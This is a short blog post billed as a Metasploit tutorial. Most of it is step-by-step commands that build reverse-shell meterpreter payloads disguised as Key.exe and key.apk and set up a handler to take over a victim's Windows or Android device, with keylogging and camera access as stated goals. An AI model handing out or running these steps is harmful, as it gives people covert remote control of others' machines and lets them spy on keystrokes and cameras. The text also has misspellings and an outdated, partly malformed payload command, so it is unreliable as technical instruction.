This Blog Are Share Computer Related Tutorials & Online Courses For Education Purpose.

Breaking

Wednesday, September 14, 2016

Metasploit Tutorial in Kali Linux With an Example And Exploiting the vulnerabilities

Metasploit TIf you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.

Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.

Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.

The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Kali Linux ).

In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Steps:-

Kali Linux Mataexploit For Windows.
  • Open Terminal 
  • #Msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=443 X > Key.exe
  • Msfconsole (Enter)
  • Msf > use exploit/multi/handler
  • set LHOST 192.168.0.108
  • set LPORT 443 (Enter)
  • exploit
  • PS – Show Process
  • Eg. Hacking Keylog , Camera, etc

Kali Linux Mataexploit For Android
  • Open Terminal
  • #msfpayload-p android/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 R > key.apk
  • Msfconsole
  • Use exploit/multi/handler
  • Set payload android/meterpreter/reverse_tcp
  • Set LHOST 192.168.0.10
  • Set LPORT 4444
  • Exploit

SHARE BY GK
Computer Knowledge

No comments:

Post a Comment